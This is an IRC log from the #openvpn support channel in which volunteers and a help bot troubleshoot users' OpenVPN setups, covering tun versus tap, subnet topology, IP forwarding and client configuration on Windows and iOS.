#openvpn 09:17 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Connection reset by peer] 09:20 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 09:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 246 seconds] 09:29 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 09:33 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:33 < EugeneKay> You shouldn't be using bridged mode. 09:36 < neilhwatson> Why? 09:36 < EugeneKay> !whybridge 09:36 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 09:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 09:38 < neilhwatson> I'd like to tunnel ipv6 through the tunnel and I want to the client to have presenc on ipv4 and ipv6 networks that the server is a member of. 09:45 -!- aduitsis [~aduitsis@dsl-aav5go.dyn.edudsl.gr] has joined #openvpn 09:59 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 09:59 -!- aduitsis [~aduitsis@dsl-aav5go.dyn.edudsl.gr] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 10:01 -!- brute11k [~brute@89.249.230.53] has joined #openvpn 10:16 < dli_> is there an iproute2 replacement for server config: push "route 192.168.3.0 255.255.255.0" 10:20 < dli_> ERROR: Linux route add command failed: external program exited with error status: 2 10:20 < dli_> can I connect openvpn 2 server using openvpn version 3 client? 10:27 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn 10:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:54 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 10:55 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 10:55 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 10:56 -!- Valcorbh [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:59 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 246 seconds] 11:08 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 11:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:11 -!- Valcorbh [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 264 seconds] 11:11 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 11:11 -!- Orbi [~opera@109.129.22.206] has left #openvpn [] 11:12 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 11:21 < EugeneKay> There is no openvpn 3.x 11:22 < EugeneKay> neilhwatson - 2.3 supports ipv6 payload; you can do all of that in routing. 11:22 < EugeneKay> Heck, you can even do 6in4 on a TAP adapter in 2.2(with script assistance for setup/teardown) 11:30 < neilhwatson> I almost have tap working. The last hurtle is that the server cannot ping the client's assigned IP. 11:31 -!- brute11k1 [~brute@89.249.230.53] has joined #openvpn 11:33 -!- brute11k [~brute@89.249.230.53] has quit [Ping timeout: 264 seconds] 11:38 < dli_> EugeneKay, sorry, I mean 2.3 client connection to 2.2 server 11:39 < dli_> EugeneKay, the client gets IP, but can not ping 11:40 < neilhwatson> dli_ I think that would work provided the client is not attempting to use a feature the server might not understand. 11:43 < dli_> neilhwatson, still couldn't ping: http://pastebin.com/3USjmDjv 11:47 < neilhwatson> Mar 2 12:40:28 dasus openvpn@tw3[23067]: ERROR: Linux route add command failed: external program exited with error status: 2 11:48 < dli_> neilhwatson, push "route 192.168.3.0 255.255.255.0" 11:48 < dli_> neilhwatson, I'm wondering whether I can try iproute2 11:49 < neilhwatson> I don't know openvpn that well. 11:50 < dli_> neilhwatson, also, the same error was there for 2.2 client, it worked with this specific error 11:52 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 12:16 -!- master_o1_master [~master_of@p4FF242D5.dip.t-dialin.net] has joined #openvpn 12:16 -!- mongoman [~mongoman@200.46.98.147] has quit [Quit: Leaving] 12:20 -!- master_of_master [~master_of@p4FF242AF.dip.t-dialin.net] has quit [Ping timeout: 244 seconds] 12:42 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 12:49 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn 13:05 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 13:16 -!- xbanux [~xbanux@triband-mum-59.182.177.192.mtnl.net.in] has quit [Ping timeout: 244 seconds] 13:21 -!- Falteckz [~Falteckz@121.99.31.205] has joined #openvpn 13:29 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has joined #openvpn 13:30 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 13:41 < marksaitis> hey. I did setup openvpn on my ubuntu 12.04 lts. Host has 10.8.0.1 mask 255.255.255.255, client has 10.8.0.6 mask 255.255.255.252 . These ips are not set in any server nor client configs, they do come as default as I understand. i used latest server and client config sample files and modified them according to official ubuntu openvpn guide. 13:41 < marksaitis> however I can not ping 10.8.0.1 from my client :))) is that to do with different masks? and why would I get different masks? 13:41 < marksaitis> please help 13:41 < marksaitis> im nearly there 13:44 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 244 seconds] 13:46 < marksaitis> i actually do have this line in server config by default, server 10.8.0.0 255.255.255.0 but it makes no sense as my serv and client tun interfaces have different masks? 13:51 < marksaitis> my client is win7 though 13:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 14:08 < pekster> marksaitis: In net30 mode, Unix/Linux clients use a PtP configuration while Windows uses a /30 14:09 < pekster> Subnet topology avoids this behaviour and sets an IP/netmask instead of using a PtP or fake /30: 14:09 < pekster> !subnet 14:09 <@vpnHelper> "subnet" is http://www.subnet-calculator.com/ or http://en.wikipedia.org/wiki/Subnetwork 14:09 < pekster> Not that. let's try this: 14:09 < pekster> !topology 14:09 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 14:10 < pekster> marksaitis: What you're seeing on the server is normal and expected. If your OpenVPN connection works and doesn't error or time out, you probably have a firewall issue 14:15 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:17 -!- Devastator [~devas@177.18.198.56] has joined #openvpn 14:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 14:18 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 276 seconds] 14:24 < marksaitis> pekster, thank you. it all connects, but as i said I do get strange mask on windows client :) 14:24 < neilhwatson> Is mtu-dics yet supposed to prevent write UDPv4 [EMSGSIZE Path-MTU=1500]: Message too long (code=90) messages? 14:25 < pekster> marksaitis: That's the /30 behaviour I described. Did you see the bot's output above telling you how you can avoid that if you like? 14:25 < pekster> Also: 14:25 < pekster> !/30 14:25 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 14:26 < marksaitis> I don't really understand this cincept of /30 and ptp :) so it didn't make sense to me. Do I just need to add topology subnet option in clients config? 14:26 < marksaitis> pekster, 14:27 < EugeneKay> marksaitis - that's okay, /30 is confusing and stupid. Just do what the tl;dr says and you'll be fine. 14:27 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 14:27 < marksaitis> pekster, also, servers config file specifies 10.8.0.1 255.255.255.0, but ifconfig says tun0 is mask 255.255.255.255 , is this normal? 14:28 < pekster> Yes, in both the p2p and net30 modes. It'll look more "normal" to what you expect if you just use topology subnet 14:29 < marksaitis> pekster, do I specify "topology subnet" line in both server and client configs? 14:29 < pekster> You can do it in just the server config if the client uses 'client' or 'pull' and does *not* have any topology set 14:29 < EugeneKay> Just the server 14:30 < marksaitis> wonderful, this stuff should be default. It makes no sense to me :))) I mean stuff is configured to have network x options, but it gets z :) 14:30 < EugeneKay> !topology 14:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 14:31 < EugeneKay> The "why" is in the link there ^ 14:31 < pekster> marksaitis: The issue is that the subnet topology is not supported for really old 2.0.9 clients 14:31 < pekster> I actually had to use one of those in the not-too-distant past due to an embedded (and highly messy) build system where building even 2.1.x was not practical (time vs cost, etc) 14:32 < EugeneKay> You poor bastard 14:32 < pekster> It was all Linux/Unix, so p2p worked fine 14:32 < pekster> No silly net30 there 14:33 < marksaitis> It now works fine!!! OMG :) thank you. If I was to have Linux client only, I would not need such an option yeah? :) 14:33 < pekster> topology subnet is recommended everywhere unless you have 2.0.9 clients that for whatever (bad) reason cannot be updated 14:33 < EugeneKay> It's a hack for Ye Olde Windows clients. Modernish ones work fine with it 14:33 < pekster> You can use p2p too, which is fine in an all-*nix environment, but subnet works fine too 14:34 < marksaitis> so if this mode is called "subnet topology", how is that older one called? 14:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:36 < pekster> See --topology in the manpage 14:36 < marksaitis> ok thank you :) 14:36 < pekster> Choices are net30 (the default) p2p, or subnet, with full descriptions as listed in the manpage 14:37 < pekster> !man 14:37 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 14:38 < marksaitis> reading it already, appreciate your help, fast and effective 14:38 < marksaitis> I got it, it allocates a whole subnet for 1 client, fair enough :) 14:40 < marksaitis> If I will now bridge my windows tun adapter with virtualbox adapter, I guess my vm will feel like they are in a private network with my server 14:40 < marksaitis> thats where I am heading with this stuff 14:40 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::] has quit [Ping timeout: 245 seconds] 14:42 < pekster> You don't bridge tun. tun is for routing, tap is for bridging 14:42 < pekster> !tunortap 14:42 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 14:42 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 14:43 < pekster> If you just want access to an internal VM LAN, tun is fine. Run openvpn on a box with access to the outside network and the inside one (often the VM host) and route between the networks 14:47 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 14:50 -!- speed_racer8 [~speed_rac@98.196.168.201] has quit [Ping timeout: 272 seconds] 14:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 15:03 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 15:09 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 15:09 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 15:11 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 245 seconds] 15:21 < marksaitis> pekster, is it difficult to make so that my vpn clients see internet thru my server? 15:22 < marksaitis> Or is it just a few lines? im doing smth now and I thought if its quick I should enable it 15:26 < pekster> !redirect 15:26 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:26 <@vpnHelper> http://ircpimps.org/redirect.png 15:27 < marksaitis> pekster, thats a client option. How about server? Will it take that traffic and route it to server eth0 gw? 15:28 < pekster> There's more than just the "client option" listed in that output 15:28 < pekster> IP forwarding, NAT, and firewall stuff is all handled at the server side 15:28 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Broken pipe] 15:29 < marksaitis> ok, so I will need to read about this a bit yeah 15:29 < pekster> Each of the !words has more output available if you query the bot 15:29 < marksaitis> You see I am bridging my vm with tap on my windows host, vm will only see my vpn server. therefore I thought how to quickly make my vpn server to be a gw :) 15:30 < marksaitis> I thought its just some sort of routing rule, 1 or 2 options 15:30 < pekster> One OpenVPN option, plus routing, plus NAT (if you're dealing with rfc1918 VPN IPs) and any necessary firewall config 15:30 < marksaitis> so I don't need to redirect all traffic to it in my case, as vpn server gw is the only one my client can see 15:31 < pekster> You don't really need/want tap in your situation, unless you're specifically trying to avoid routing for some reason 15:32 < marksaitis> I will statically config my client with gw, now how do I make my server tun adapter to route these packets to eth0 for internet? 15:33 < marksaitis> i dont know what do I need. I have my linux server in datacentre directly sitting on internet ip and stuff at home/office :) 15:33 < pekster> IP forwarding. Just like the bot output said. See the "!ipforward" word? If you type it, the bot tells you more 15:33 < marksaitis> my windows host has vm client which i want to sit on a virtual network with my server on the internet. 15:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 15:33 < marksaitis> !ipforward 15:33 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 15:34 < marksaitis> wooooo, kernel? 15:34 < marksaitis> i just want servers tun to be gateway to internet :) 15:34 < marksaitis> I want routing 15:35 < pekster> So follow the directions for your OS/distribution to enable IP forwarding, firewall, and NAT. Just like the bot said 15:40 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 15:41 < marksaitis> ok thanx 15:42 < marksaitis> !linipforward 15:42 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 15:43 < marksaitis> pekster, ok lets say I enable ip forwarding on the system. now what, how do I make 10.8.0.1 to be functional gw for my clients? do I add routing rule? 15:44 < pekster> IP forwarding turns it into a router. All the normal routing rules apply. Perhaps you'd like a more basic entry-level guide to how TCP/IP networking works? 15:44 < pekster> !tcpip 15:44 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 15:44 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 15:52 < marksaitis> I know how it works, headers and routing information etc... :) 15:52 < marksaitis> thanx anyways 15:53 < marksaitis> pekster, ip forwarding turns "what" in to a router? the system? 15:54 < pekster> Yes. It tells the kernel to route packets that are not bound for the local system 15:55 < pekster> That's a pretty basic networking concept; if you don't have a good handle on basic networking, you should get that exposure first before you try and add openvpn to the mix. OpenVPN is hard to use without a functional understand of how networking/routing/firewalls work 15:55 < pekster> !101 15:55 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 15:56 < pekster> IP forwarding is generally just a "switch" if you'd like that says "route such packets" instead of the default of "ignore these packets." They then hit the routing rules and get sorted into a table and handled according to the routing rules. All of which is beyond the scope of openvpn (your OS/kernel does this) 16:01 < marksaitis> understood, I have good basic understanding of it, just never enabled it on linux 16:05 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds] 16:09 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 16:16 -!- Falteckz [~Falteckz@121.99.31.205] has quit [Quit: Leaving] 16:23 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:27 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has quit [Ping timeout: 264 seconds] 16:32 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 16:44 < JackSparrow> hi, i'd like to redirect a port range from my server's public interface to one local IP 16:44 < JackSparrow> like eth0:42000 => tun0 10.8.0.42:42000 16:45 < JackSparrow> i've already tried lots of iptable things, no one worked. 16:49 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 17:03 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 17:05 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds] 17:09 < marksaitis> pekster, would you have any idea? I connected to openvpn server with my host - all ok I got 10.8.0.4 Ip with it, can ping 10.8.0.1 just fine. I run vm on my host, therefore I bridged vm with hosts tun adapter, but my vm does not get any ip and morover if i statically configure it, it is still a no-go. Any ideas? 17:09 < marksaitis> what can i be missing here 17:09 < marksaitis> :) 17:09 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has quit [Quit: bluethundr] 17:11 < pekster> You cannot bridge a tun adapter, as I stated earlier. It does not work. http://paste.kde.org/685820/ 17:16 < marksaitis> really, omg 17:16 < marksaitis> how do I go about it then pekster ? 17:17 < marksaitis> I mean all I did is specified bridge to tun adapter using virtualbox :) 17:17 < marksaitis> on my host client 17:18 < marksaitis> does it mean that I would need to use routing on my host then? and set my vm to do hostonly networking? :) 17:18 < marksaitis> is that the only way do you think? 17:19 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:19 -!- mode/#openvpn [+o krzee] by ChanServ 17:24 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 17:24 < pekster> marksaitis: You *cannot* bridge tun adapters. for the 3rd time. tun is OSI Layer 3. Ethernet is OSI Layer 2. You cannot do what your propose 17:25 < pekster> Maybe the silly "WIN32 TAP Adapter" in windows pretends to let you do it, but it does not work becuase OpenVPN is unable to send Ethernet frames in tun mode. That's how tun works 17:28 < pekster> Learn to route properly between your subnets, or use tap if you actually wanted a bridge 17:30 < marksaitis> alright, in my scenario I should use tap then yeah? 17:32 < pekster> Not unless you actually need to send Layer 2 frames (Ethernet) between your hosts 17:32 < pekster> If you do not need Layer 2 protocols, you should use tun unless you have a very good reason not to 17:32 < pekster> In case you missed it above: 17:32 < pekster> !tunortap 17:32 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 17:32 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 17:33 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has joined #openvpn 17:42 < marksaitis> well, ok. i know what these layers are. i just didnt knew tun and tap. I do know that tun is more efficient 17:42 < marksaitis> so tun is layer 2 ethernet frames, tap is layer 3 packets yeah 17:43 < marksaitis> woops, the other way round I ment :) 17:44 -!- JackSparrow [~death@2001:41d0:1:d4e5:1234:1234:1234:1234] has joined #openvpn 17:44 < marksaitis> tun layer 3, tap layer 2 17:45 < marksaitis> which means in layer 2 ip packets get encapsulated in to ethernet frames and thats where overhead comes from 17:46 < marksaitis> I get it. I just dont understand then, if tun works in layer 3, why i can not ask my host to take that ip packet and route it 17:48 < pekster> You can. This is not done by "bridge to tun adapter using virtualbox" as you said earlier 17:49 < marksaitis> yeah, that stuff doesnt work. In which case I need to tell my host to do some routing yeah 17:49 < marksaitis> whichever way I go, I just want my vm to feel like it is in a lan with my server on 10.8.0.1 17:50 < pekster> So put openvpn on the VM and have it connect as a client. Done. 17:51 -!- brute11k1 [~brute@89.249.230.53] has quit [Quit: Leaving.] 17:56 < marksaitis> pekster, I cant do so :))) 17:57 < marksaitis> because my vm needs to be in the network before OS starts as well 17:57 < marksaitis> and surely before someone logs in 18:03 < marksaitis> pekster, so am i better of to use tap and then bridge it, or use tun and do some routing on the host? it's just that I guess host would receive stuff from vm and it would route it thru main connection instead of tun adapter.. 18:04 -!- Netsplit *.net <-> *.split quits: hive-mind, daemoen, rkantos, gardar, jtrucks, batrick 18:04 -!- rkantos [robin@109.169.7.197] has joined #openvpn 18:04 -!- Netsplit over, joins: jtrucks 18:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 18:05 -!- Netsplit over, joins: gardar 18:05 -!- Netsplit over, joins: batrick 18:05 -!- Netsplit over, joins: daemoen 18:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:09 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:21 <@krzee> marksaitis, tun or tap is a decision that is unrelated to that 18:21 <@krzee> the only thing that goes into tun or tap is "do i need a layer2 protocol over my vpn?" 18:21 <@krzee> yes = tap, no = tun 18:21 <@krzee> and then further, if i DO need layer2… "do i need layer2 to the LAN behind the vpn?" 18:21 <@krzee> yes = bridge, no = routed 18:22 <@krzee> meh maybe i should make a small flowchart for that sometime 18:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 18:24 < marksaitis> in my case I cant make it to work with tun, however I switched everything to tap and it works now :) the only thing is, I do have my openvpn server system ip forwarding enabled, but it doesnt do that for me :( does it need restart maybe 18:24 <@krzee> if its windows yes 18:24 < marksaitis> krzee, I do understand what you are saying :) 18:24 < marksaitis> openvpn server is linux 18:25 <@krzee> sysctl -a|grep forward 18:25 <@krzee> !linipforward 18:25 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 18:25 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 18:25 < vaillor> hi guys 18:25 < marksaitis> thats what I did :) 18:26 < marksaitis> I have no iptables there 18:26 < vaillor> openvpn is a stand alone service? 18:26 <@krzee> vaillor, as opposed to what? 18:26 < vaillor> because i installed https://itunes.apple.com/us/app/openvpn-connect/id590379981 on my iphone 18:26 <@vpnHelper> Title: OpenVPN Connect for iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, iPod touch (3rd generation), iPod touch (4th generation), iPod touch (5th generation) and iPad on the iTunes App Store (at itunes.apple.com) 18:26 < vaillor> and it asks me to login 18:26 <@krzee> did you import a config? 18:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 18:27 < vaillor> no 18:27 < vaillor> how to do it? 18:27 <@krzee> your server is a normal opensource openvpn, right? 18:27 <@krzee> (or AS?) 18:27 < vaillor> is a linux debian terminal 18:28 <@krzee> theres 2 ways to import your configs 18:28 <@krzee> 1 is through itunes (where you can add files) 18:28 <@krzee> other is via email 18:28 <@krzee> can you do the itunes way? 18:29 < vaillor> ok, but why is tehre a sign in form? 18:29 < vaillor> yes 18:29 <@krzee> OpenVPN Connect is the official full-featured iPhone/iPad client for the OpenVPN Access Server, Private Tunnel and OpenVPN Community 18:29 <@krzee> because it supports 3 things 18:29 <@krzee> you are using openvpn community 18:29 <@krzee> if you were using one of the other 2 maybe the login stuff would matter 18:30 < vaillor> how this app works, usually iphone apps are jailed 18:30 <@krzee> it is jailed 18:30 <@krzee> there is a VPN API in ios 18:31 < vaillor> that makes it not jailed? 18:32 <@krzee> it is jailed 18:32 <@krzee> it doesnt need root now 18:32 <@krzee> same with the newer android versions 18:33 < vaillor> so, all the app of my iphone can connect trought openvpn network? 18:33 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 18:33 <@krzee> depends on your config 18:33 <@krzee> but yes its possible 18:33 < vaillor> in what sense depends on my config? 18:34 <@krzee> openvpn doesnt ALWAYS redirect internet 18:34 <@krzee> it only makes a secure connection between 2 hosts 18:34 <@krzee> what you do on top of that is up to your configs 18:34 <@krzee> (or scripts or whatever) 18:34 <@krzee> also, i strongly recommend testing your setup outside of the iphone first 18:34 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving] 18:35 <@krzee> get it running how you want from another machine, then use that config on the iphone 18:35 < vaillor> i'm usually using ipSEC that is natively supported by ios. and it always redirects my connection 18:35 <@krzee> congratulations, have a cookie =] 18:35 < vaillor> the problem is that ipsec is at network layer 18:35 <@krzee> !redirect 18:35 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:35 <@vpnHelper> http://ircpimps.org/redirect.png 18:36 < vaillor> is it a flow-chart? 18:36 <@krzee> ? 18:36 < vaillor> the link 18:36 <@krzee> the last one is 18:37 <@krzee> but i was showing you the info of what you'll need to redirect internet over your vpn 18:37 <@krzee> and like i said, get another client working BEFORE you try the iphone 18:37 <@krzee> iphone is less ideal to troubleshoot your entire vpn on 18:38 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 272 seconds] 18:38 < vaillor> ok 18:38 <@krzee> then when we know the server is how you want it, and you have a working client config from the test client, then we toss it on the iphone 18:38 < vaillor> thank you for helping me 18:39 <@krzee> you're welcome 18:40 < vaillor> ah, so, last question, does openvpn app support http proxy? 18:41 <@krzee> im not sure if the ios version does or not, openvpn community version definitely does 18:41 <@krzee> ios version is a re-write, closed source (otherwise apple store wouldnt take it) 18:41 <@krzee> so not *everything* is in it 18:41 <@krzee> !man 18:41 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 18:41 <@krzee> theres proxy stuff in there 18:42 -!- mode/#openvpn [+vvvv pekster soapee01 rob0 oc80z] by krzee 18:42 -!- mode/#openvpn [+vv EugeneKay _quadDamage] by krzee 18:43 -!- JSharpe [~JSharpe@146.185.24.18] has quit [Quit: Leaving] 18:43 < vaillor> unfortunately i need it to pass throught a protocol inspecting firewall that make it pass only http and https traffic, so i need to use an http proxy relay with CONNECT method to make it pass other stuff in 18:43 <@krzee> which im sure is tcp only 18:44 <@krzee> and only takes tcp 18:44 <@krzee> so then you have a tcp proxy, tcp openvpn, and tcp inner traffic 18:44 <@krzee> you'll have issues 18:44 <@krzee> !tcp 18:44 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 18:44 <@krzee> ESPECIALLY when on 3g or similar 18:44 < marksaitis> krphop, I enabled ip forwarding for sure on my linux openvpn server, but it still doesnt do it :) how can I diagnose it? 18:45 < vaillor> i can hide traffic with an ssl tunnel supported by firewall, because it supports https 18:45 < vaillor> so, firewall can't know anymore what's passing in ssl tunnel 18:46 <@krzee> irrelevant to the problem you'll have 18:47 < vaillor> for example on my server i created a https proxy with squid 18:47 < vaillor> from the pc client i use stunnel like a wrapper 18:48 < vaillor> stunnel establish an encrypted ssl tunnel with proxy. and with my application like, irc, skype and so on, i connect to stunnel that conencts to proxy server that connects to the origin server 18:49 <@krzee> i understand 18:49 <@krzee> read this: 18:49 <@krzee> !tcp 18:49 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 18:49 <@krzee> link #1 18:49 <@krzee> that is talking about tcp over tcp 18:49 <@krzee> you are going to do tcp over tcp over tcp 18:50 <@krzee> and then im guessing you may connect over 3g / 4g from time to time 18:50 <@krzee> your connection is likely going to be crap, with ever increasing latency until disconnect 18:50 <@krzee> then reconnect, rinse and repeat 18:52 <@krzee> marksaitis, show me the following in pastebin: cat /proc/sys/net/ipv4/ip_forward ; iptables -v -L 18:53 < marksaitis> krzee, 